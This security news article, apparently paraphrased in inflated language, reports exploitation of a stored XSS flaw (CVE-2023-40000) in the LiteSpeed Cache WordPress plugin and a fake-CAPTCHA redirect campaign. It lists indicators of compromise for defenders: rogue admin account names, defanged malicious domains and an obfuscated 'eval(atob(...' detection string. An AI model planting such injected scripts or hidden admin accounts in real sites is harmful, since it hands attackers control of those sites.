An impactful vulnerability within the LiteSpeed Cache plugin for WordPress is presently under active exploitation by malevolent agents, facilitating the establishment of illicit administrative accounts on vulnerable websites.
These discoveries arise from WPScan, indicating that the susceptibility (CVE-2023-40000, scoring 8.3 on the CVSS scale) has been utilized to create fraudulent admin entities bearing the monikers “wpsupp‑user” and “wp‑configuser.”
CVE-2023-40000, unveiled by Patchstack in February 2024, denotes a stored cross-site scripting (XSS) vulnerability, potentially enabling an unauthorized user to escalate privileges via carefully crafted HTTP requests.
This flaw received resolution in October 2023 through version 5.7.0.1. Notably, the most recent iteration of the plugin, version 6.2.0.1, was unveiled on April 25, 2024.
With over 5 million active installations, LiteSpeed Cache exhibits a notable presence, with data suggesting that a substantial 16.8% of all websites retain versions outside the 5.7, 6.0, 6.1, and 6.2 range.
As per insights from the Automattic-owned firm, the malware typically implants JavaScript code into WordPress files, hosted on domains such as dns.startservicefounds[.]com and api.startservicefounds[.]com.
The creation of administrative accounts on WordPress platforms carries grave ramifications, affording threat actors full dominion over the website, enabling a spectrum of arbitrary actions from malware injection to the installation of pernicious plugins.
To mitigate potential perils, users are urged to apply the latest patches, conduct a comprehensive review of installed plugins, and expunge any dubious files or directories.
“Conduct a thorough examination of the database for suspicious strings like ‘eval(atob(Strings.fromCharCode,'” advised WPScan, emphasizing scrutiny of the ‘litespeed.admin_display.messages’ option.
This development coincides with Sucuri’s revelation of a redirect scheme christened Mal.Metrica, employing counterfeit CAPTCHA verification prompts on compromised WordPress platforms to steer users towards deceptive and undesirable destinations, facilitating the download of dubious software or coaxing individuals into disclosing personal information under the pretense of receiving rewards.
“While this prompt may appear to be a routine human-verification measure, it is, in fact, wholly spurious — aiming to deceive users into clicking the button, thereby initiating a redirect to malevolent and deceptive websites,” elucidated security researcher Ben Martin.
Similar to the Balada Injector, this activity capitalizes on recently disclosed vulnerabilities in WordPress plugins to introduce external scripts masquerading as content delivery networks (CDNs) or web analytics services. To date, Mal.Metrica has compromised a staggering 17,449 websites in 2024.
“Owners of WordPress websites may wish to contemplate enabling automatic updates for core files, plugins, and themes,” recommended Martin. “Moreover, ordinary web users should exercise caution when encountering links that seem incongruous or suspect.”
